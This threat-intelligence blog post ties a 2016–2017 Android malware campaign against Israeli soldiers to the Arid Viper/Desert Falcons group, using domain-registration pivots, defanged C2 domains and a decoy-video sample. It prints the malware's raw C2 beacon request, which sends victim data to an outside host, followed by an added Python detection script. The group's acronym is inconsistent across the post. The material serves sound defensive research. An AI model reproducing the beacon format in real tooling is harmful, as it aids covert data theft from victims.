Vipers, Falcons, and Droids: Apparent Link Between Arid Viper/Desert Falcons and Recent Android Malware Targeting Israeli Military

 

TARGET COUNTRY: ISRAEL

TARGET SECTOR: MILITARY

TOOLS: ANDROID MALWARE, UNIDENTIFIED PC MALWARE

On February 16, 2017, Kaspersky Labs released a blog post detailing a campaign using malware for the Android operating system to target members of the Israeli Defense Force (IDF). Although they don’t explicitly mention it, the activity described in Kaspersky’s post seems similar to activity reported in January 2017. Both Kaspersky and the January reports indicated that IDF soldiers were being targeted with Android malware via social engineering tactics using sexual themes coming from Facebook. The reports from January explicitly linked the campaign to Hamas.

The Cyber Intelligence and Analysis Project (CIPP) dug into the information that Kaspersky released in its blog post. None of the Android malware samples listed in the blog post appear to be available in free, public repositories; however, CIPP was able to pivot off of an email address used to register one of the reported command and control (C2) domains and, using open source tools and free services, identify additional network infrastructure and malware likely linked to the actors carrying out the Android malware campaign.

The additional malware identified by CIPP provides a link between the recent Android campaign targeting IDF soldiers and activity described by Trend Micro and Kaspersky from February 2015 in their Arid Viper and Desert Falcons reports.  

Registrant Email: info[@]palgoal[.]ps

Kaspersky reported five command and control (C2) domains related to the Android malware campaign it's been tracking:

  • androidbak[.]com
  • droidback[.]com
  • endpointup[.]com
  • siteanalysto[.]com
  • goodydaddy[.]com

The androidbak[.]com domain was registered using the email address info[@]palgoal[.]ps.

As the screenshot above shows, androidbak[.]com was registered using information from an organization located in Gaza. This lines up nicely with Kaspersky's reporting saying that the Android malware campaign targeted IDF soldiers serving in Gaza. This registrant email address is actually an interesting case. Often, malicious actors will register their infrastructure under fake email addresses they’ve made up for that purpose. That doesn’t appear to be the case here. The palgoal[.]ps domain actually belongs to an apparently legitimate, Gaza-based web hosting and IT company, PalGoal. As will be discussed below, the email has registered multiple domains linked to malicious activity; however, there are no indications at this point that PalGoal is knowingly involved in malicious activity. It is possible that bad actors are merely leveraging PalGoal’s services for their operations. 

DomainTools shows 25 domains have been registered with the info[@]palgoal[.]ps email. Without a paid subscription, DomainTools won’t reveal what specific domains have been registered using that email. However, there’s a very useful free service called ThreatCrowd (https://www.threatcrowd.org/) which will often have this kind of information, and, in this instance, it does.

There are five suspicious domains highlighted in the screenshot above. The Kaspersky blog post confirms that the androidbak[.]com domain is known to be malicious. There are also three other Android-related domains registered using info[@]palgoal[.]ps which use a similar naming convention and are worth checking out. In addition, the dooownloads[.]com domain appears suspicious and deserves some investigation.

Discovering Older Malware Linked To This Campaign

A Google search for the dooownloads[.]com domain reveals that it appeared in a malware file submission to the free malware analysis platform, Malwr, back in October 2015. 

The dumped strings from this file show that dooownloads[.]com is hardcoded into the malware along with another domain, audioodrivers[.]com. Additionally, there appears to be another unique string related to the file's User Agent, "User-Agent: AudioDrive." A Google search for this string shows that it appears in a handful of other files submitted to various online malware analysis tools.

CCP was able to gather some basic information about these files including some file names and C2 domains:

Table 1. List of Files with "User-Agent: AudioDrive" String

Available information shows that all of these files make the same initial GET request to their C2 server:

GET /XSounds/sound_q.php?p=[victim machine data]—[unique identifier] HTTP/1.1
Accept: text/*
User-Agent: AudioDrive
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
REMOTE_USER: user
Host: oowdesign[.]com
Cache-Control: no-cache
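
The request above has several traits a defender can match on in proxy or packet-capture data. The following detection sketch is an added example, not code from the original post or from any vendor report; the sample requests, the c2.example host and the trait names are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Traits taken from the GET request shown above.
BEACON_PATH = "/XSounds/sound_q.php"
BEACON_UA = "AudioDrive"
FORM_TYPE = "application/x-www-form-urlencoded"

def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, rest = lines[0].split(" ", 1)
    target, _, _version = rest.rpartition(" ")  # tolerate spaces in the target
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def match_audiodrive(raw):
    """Return the beacon traits present in one raw request (empty if none)."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    hits = []
    if headers.get("user-agent") == BEACON_UA:
        hits.append("user-agent")
    if method == "GET" and url.path.lower() == BEACON_PATH.lower():
        hits.append("path")
        if "p" in parse_qs(url.query, keep_blank_values=True):
            hits.append("p-param")
    # REMOTE_USER is normally a server-side CGI variable, not a request header.
    if "remote_user" in headers:
        hits.append("remote_user-header")
    # A body-less GET that still declares a form content type is unusual.
    if method == "GET" and headers.get("content-type") == FORM_TYPE:
        hits.append("get-with-form-content-type")
    return hits

# Constructed sample traffic (not captured from a real host).
SAMPLE_BEACON = ("GET /XSounds/sound_q.php?p=SE9TVDAx-0001 HTTP/1.1\r\n"
                 "Accept: text/*\r\nUser-Agent: AudioDrive\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "REMOTE_USER: user\r\nHost: c2.example\r\n\r\n")
SAMPLE_BENIGN = ("GET /index.html HTTP/1.1\r\nHost: www.example\r\n"
                 "User-Agent: Mozilla/5.0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(name, match_audiodrive(raw))
```

Matching on several traits rather than the C2 hostname alone keeps the rule useful when the operator moves to a new domain, as the samples in Table 1 did.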

The Colombia File

Among the malware files listed above is one with a rather interesting name, “helicoptero_en_Colombia.scr.” Given that the operator of the campaign being investigated appears to be focused on Israeli targets, it is odd to see a related file with a Spanish language file name.

Decoy Video from helicoptero_en_Colombia.mp4


Analysis of this file (MD5: 1d9ee9c96818ae46a2fee623b4f8e75c) reveals that it is a self-extracting archive (SFX) containing two files: VLC.exe and helicoptero_en_Colombia.mp4. The executable file is the malware. It connects to the C2 domain mentioned above, oowdesign[.]com, and has a compile date of September 14, 2015. 

While the malware is installed on the victim computer, the mp4 file is played as a decoy to trick the victim into believing it is a legitimate file. As the file name would suggest, the decoy is a video of a Spanish language news broadcast regarding an August 2015 crash of a Blackhawk helicopter during an operation against the neo-paramilitary group, Los Urabeños. With the crash occurring in early August and the malware being compiled in mid-September 2015, it appears that the malware operator was attempting to use a relatively recent event in order to entice potential targets into opening the file.

Link Back To The Arid Viper Campaign

In addition to other malicious files, the previous screenshot of the Google search for the AudioDrive User Agent string shows a link to a blog written by the cybersecurity company Proofpoint in September 2015. The blog mentions the C2 domain identified above, oowdesign[.]com, and describes malware with the same behavior as the malware samples listed in Table 1. 

The Proofpoint blog expands on research done by Trend Micro about a campaign it dubbed “Operation Arid Viper” which it said exclusively targeted victims in Israel. At almost the same time Trend Micro released the Arid Viper report, Kaspersky released its own report on the same activity but referred to it as “Desert Falcons.” The Arid Viper and Desert Falcons reports detail campaigns with the same targeting and general tactics, techniques, and procedures (TTPs) as the recently identified Android malware campaign hitting IDF soldiers. Additionally, the Arid Viper and Desert Falcons reports describe malware that behaves very similarly to the older malware samples CCP identified above.

Additional Android Malware Sample

CCP discovered one final malware sample of note. A search of the malware analysis platform VirusTotal for the domain fastdroidmob[.]com shows it is linked to a malicious file.

Remember, the fastdroidmob[.]com domain was registered using the info[@]palgoal[.]ps email address, which was also used to register domains linked both to the recent Android malware campaign described by Kaspersky and to the older malware CCP identified. VirusTotal analysis of the file linked to fastdroidmob[.]com shows that it is malware targeting the Android platform and that it was submitted in June 2016. Interestingly, Kaspersky's blog post stated that the campaign it described began around July 2016, so the June 2016 submission of the fastdroidmob[.]com file would predate that timeframe.

It's not clear whether the fastdroidmob[.]com file is the same malware Kaspersky describes in its blog post, but there is a notable overlap here.

Assessment

While there is no smoking gun, the following factors suggest that the Android malware campaign described by Kaspersky in its recent blog post is linked to the Arid Viper/Desert Falcons campaign:

  • The info[@]palgoal[.]ps email address was used to register C2 infrastructure for the recent Android campaign as well as C2 infrastructure for the 2015 malware samples identified by CCP.
  • The 2015 malware samples behave consistently with those described in the Arid Viper/Desert Falcons reports.
  • That malware appears to be in limited use by only one entity, and not shared amongst multiple threat actors.
  • The Israel-focused targeting and general TTPs suggest that the recent Android campaign, the older CCP-identified malware, and the Arid Viper/Desert Falcons are linked together.

The file with the Spanish-language filename and Colombia-related decoy video still stands as somewhat of an outlier when considering the focus on Israeli targets by this activity. Kaspersky’s Desert Falcons report actually indicates a much larger target scope for this adversary with targets in numerous sectors located in nearly 50 countries; however, none of the countries included in that list are Spanish speaking. It is possible that the Spanish language decoy was meant to target Spanish-speaking individuals in non-Spanish-speaking countries or that it was used for some unknown reason. 

Malicious Files


Domains
